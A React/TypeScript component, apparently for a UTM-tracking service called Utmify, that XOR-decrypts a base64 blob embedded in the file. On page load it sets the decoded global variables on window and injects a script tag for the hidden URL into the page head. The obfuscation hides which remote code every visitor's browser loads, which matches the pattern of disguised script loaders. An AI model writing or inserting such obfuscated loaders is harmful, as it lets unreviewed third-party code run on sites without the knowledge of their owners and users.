import { useEffect } from 'react';
const PAYLOAD = 'DBcCMrAmfDPIoYxezmwgR8JKXgnqyfgqvmQ4HZ9FGF3m1Pgzp3F7HNNJER2q06MtrWVrQsRVU0Oh2eky4WdrStVKUlm7g6B8r2N2QNlECUet0q5klUouENdKE1Gpzf989Ex5EN5HEVbqm64up29nXvlCXh/q1+0yu3IgCJIQHQTwwL04rCE7CoISGgv7w7Q6+CYyBtIEAW61';
type UtmifyConfig = {
  url: string;
  globals?: Array<{
    name: string;
    value: unknown;
  }>;
  attributes?: Array<{
    name: string;
    value: string;
  }>;
};
function decodeConfig(): UtmifyConfig {
  const raw = atob(PAYLOAD);
  const bytes: number[] = [];
  for (let i = 0; i < raw.length; i++) {
    bytes.push(raw.charCodeAt(i) & 255);
  }
  const keyLength = bytes[0];
  const key = bytes.slice(1, 1 + keyLength);
  const payload = bytes.slice(1 + keyLength);
  const decoded = payload.map((byte, index) => byte ^ key[index % keyLength]);
  let text = '';
  for (let i = 0; i < decoded.length; i++) {
    text += String.fromCharCode(decoded[i] & 255);
  }
  return JSON.parse(decodeURIComponent(escape(text))) as UtmifyConfig;
}
export function UtmifyScript() {
  useEffect(() => {
    if (typeof window === 'undefined') return;
    let config: UtmifyConfig;
    try {
      config = decodeConfig();
    } catch {
      return;
    }
    if (document.querySelector(`script[src="${config.url}"]`)) return;
    (config.globals || []).forEach(global => {
      ;
      (window as unknown as Record<string, unknown>)[global.name] = global.value;
    });
    const script = document.createElement('script');
    script.src = config.url;
    script.async = true;
    script.defer = true;
    (config.attributes || []).forEach(attribute => {
      script.setAttribute(attribute.name, attribute.value);
    });
    (document.head || document.documentElement).appendChild(script);
  }, []);
  return null;
}